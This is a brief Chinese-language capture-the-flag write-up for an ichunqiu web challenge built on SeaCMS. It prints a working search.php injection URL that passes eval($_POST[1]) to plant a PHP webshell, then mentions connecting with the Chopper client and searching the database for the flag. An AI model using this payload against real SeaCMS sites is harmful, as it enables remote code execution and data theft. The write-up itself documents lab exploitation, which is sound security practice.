Web题目名称:Test
题目内容:
善于查资料,你就可以拿一血了。
给了我们一个链接
打开就是海洋cms的模板,通过
查百度发现海洋的一个search.php漏洞
Seacms漏洞分析利用复现 By Assassin
ichunqiu
通过这两个 复现漏洞(注意 这里 get post 都可以)
http://53290ec71e554551a257d1a5ce00ab1044953f4646134c17.game.ichunqiu.com/search.php/?searchtype=5&tid=&area=eval($_POST[1])
在search.php 中写入一句话 菜刀连接 密码为 1
翻看了一遍,发现并没有flag文件
通过猜测在登陆等php中会出现数据库 一步步查找数据库相关数据(flag可能在数据库中)
FLAG到手了 好难啊